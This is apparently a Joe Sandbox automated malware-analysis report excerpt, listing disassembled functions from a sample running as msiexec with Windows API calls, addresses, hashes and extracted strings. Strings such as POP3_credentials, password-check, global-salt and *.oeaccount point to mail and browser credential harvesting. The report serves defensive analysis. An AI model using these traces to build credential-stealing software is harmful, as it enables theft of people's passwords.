                                                                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                          • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                          • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                          • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                          • String ID:
                                                                                          • API String ID: 3642520215-0
                                                                                          • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                          • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                          • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                          • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                          APIs
                                                                                          • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                          • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                          • GetDC.USER32(00000000), ref: 004072FB
                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                          • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                          • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1999381814-0
                                                                                          • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                          • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                          • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                          • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpymemset
                                                                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                          • API String ID: 1297977491-3883738016
                                                                                          • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                          • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                          • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                          • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                          APIs
                                                                                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                            • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                            • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                            • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                            • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$memset
                                                                                          • String ID: gj
                                                                                          • API String ID: 438689982-4203073231
                                                                                          • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                          • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                          • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                          • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: __aulldvrm$__aullrem
                                                                                          • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                          • API String ID: 643879872-978417875
                                                                                          • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                          • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                          • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                          • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040810E
                                                                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,684F7B60,?), ref: 004081B9
                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                          • API String ID: 524865279-2190619648
                                                                                          • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                          • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                          • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                          • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                          • String ID: 0$6
                                                                                          • API String ID: 2300387033-3849865405
                                                                                          • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                          • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                          • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                          • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                          APIs
                                                                                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                          • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                          • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                          • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                          • String ID: pwOh
                                                                                          • API String ID: 1189762176-793623541
                                                                                          • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                          • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                          • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                          • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _mbscat$memsetsprintf
                                                                                          • String ID: %2.2X
                                                                                          • API String ID: 125969286-791839006
                                                                                          • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                          • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                          • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                          • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                          APIs
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                            • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                            • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                            • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                            • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                            • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                            • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                            • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                          • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                          • String ID: ACD
                                                                                          • API String ID: 82305771-620537770
                                                                                          • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                          • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                          • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                          • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004091EC
                                                                                          • sprintf.MSVCRT ref: 00409201
                                                                                            • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                            • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                            • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                          • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                          • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                          • String ID: caption$dialog_%d
                                                                                          • API String ID: 2923679083-4161923789
                                                                                          • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                          • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                          • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                          • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                          APIs
                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                          • memset.MSVCRT ref: 00410246
                                                                                          • memset.MSVCRT ref: 00410258
                                                                                            • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                          • memset.MSVCRT ref: 0041033F
                                                                                          • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                          • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                          • String ID:
                                                                                          • API String ID: 3974772901-0
                                                                                          • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                          • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                          • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                          • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                          APIs
                                                                                          • wcslen.MSVCRT ref: 0044406C
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                          • strlen.MSVCRT ref: 004440D1
                                                                                            • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                            • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                          • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                          • String ID:
                                                                                          • API String ID: 577244452-0
                                                                                          • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                          • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                          • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                          • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                          APIs
                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                          • _strcmpi.MSVCRT ref: 00404518
                                                                                          • _strcmpi.MSVCRT ref: 00404536
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strcmpi$memcpystrlen
                                                                                          • String ID: imap$pop3$smtp
                                                                                          • API String ID: 2025310588-821077329
                                                                                          • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                          • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                          • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                          • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040C02D
                                                                                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                            • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                            • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                            • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                            • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                            • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                            • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                          • API String ID: 2726666094-3614832568
                                                                                          • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                          • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                          • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                          • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                          APIs
                                                                                          • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                            • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                            • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                            • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                          • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                          • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                          • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcmp$memcpy
                                                                                          • String ID: global-salt$password-check
                                                                                          • API String ID: 231171946-3927197501
                                                                                          • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                          • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                          • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                          • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@
                                                                                          • String ID:
                                                                                          • API String ID: 613200358-0
                                                                                          • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                          • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                          • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                          • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040644F
                                                                                          • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                          • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                            • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                            • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                          • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                          • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                          • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                          • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                            • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$memset
                                                                                          • String ID:
                                                                                          • API String ID: 438689982-0
                                                                                          • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
